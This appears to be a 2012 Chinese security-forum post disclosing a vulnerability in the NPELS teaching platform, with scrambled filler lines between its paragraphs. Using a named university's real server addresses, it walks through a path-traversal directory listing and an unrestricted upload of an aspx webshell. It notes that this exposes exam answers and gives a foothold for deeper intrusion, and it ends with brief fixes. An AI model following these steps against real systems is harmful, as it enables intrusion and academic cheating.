中国网络渗透测试联盟
标题:
新理念外语网络教学平台文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-12-4 11:10
标题:
新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
( G- F6 H$ g+ I- _$ G$ G
X/ a9 K8 a* S9 f# I
详细说明:
; z" R( B2 v" Z( I. |4 G1 W5 o
% Q# I2 H3 u2 q/ Q8 T9 |
以南开大学的为例:
8 Y" V3 f2 \5 V# q" e% z' D9 a
http://222.30.60.3/NPELS
3 r) E q1 `% `
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
8 t2 {7 j8 j9 H: }- Z
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
/ t2 K6 `, {( r- O
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
/ y2 S) D, [- S! T' x
</setting>
9 `% t, l* K4 N" l7 G# N
及版本号
3 j9 ]: |' j) f- P( d- ]; S8 j
<add key="TVersion" value="1, 0, 0, 2187">
9 ^5 O! x+ B/ I, H
</add>
( }2 N4 [/ {: l0 h- w7 [+ k, i
直接访问
7 f6 ^7 K4 G2 n X4 c" D
http://222.30.60.3/NPELS/CommonService.asmx
. g( @+ ^+ ~/ I
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
t" S+ V! t1 E
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1
, 0, 0, 2187
; ?; Z3 s5 e* O
进一步列目录(返回的网页很大,可以直接 wget 下来)
4 `( y+ Y; Q& d2 v
http://222.30.60.3/NPELS/CommonS ... List?version=../../
7 E( F4 M2 r& z+ o! \0 _! w
5 P; k( E2 }. O# {; f' ]6 P
发现
2 B3 u- G5 i# G( d2 B! H: w
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
! |! X4 E) d1 F/ K* ^9 M' H% V
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
2 ?; a* ^; v* X% d, [6 j
上传后继续列目录找到木马地址直接访问即可
# L) j" p, H+ j# V) @/ j
' |: O0 b' d4 y3 R
OOXX
( h6 ~6 g F; Y9 _! I
+ i% d' b- o, [, y0 h
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
2 b" s, R& h4 D2 o
漏洞证明:
( V; s/ j$ w- b2 B( b
6 b& }" [7 U/ S, f0 X" [ ]1 _- g
列目录:
. u2 G" e5 s/ a k% M: c+ w) n- Q
http://222.30.60.3/NPELS/CommonS ... List?version=../../
8 @& R8 n* V2 k9 K* N2 }
文件上传:
; D4 Y) B0 l- W- V
http://222.30.60.3/npelsv/editor/editor.htm
$ \ W1 P6 U# J/ g* g
( i- S& e9 ]) n1 f0 N+ E" s
上传木马:
6 ?4 `; }$ r4 E1 Q: k( u- x, F
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
; H8 U; O$ z5 @2 j
0 j5 F! Q& @* s5 D4 Q9 q
修复方案:
7 e' K9 H- z1 n1 @/ D. B
好像考试系统必须使用 CommonService.asmx
1 p5 {; A6 x. X# Y
最好配置文件加密或者用别的方式不让它泄露出来
, q* P [, Q4 ~, S, \8 F
并且检查或删除各上传入口,像
http://222.30.60.3/NPELS/Upload.aspx
一样
8 q/ D+ y/ z" G# F
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2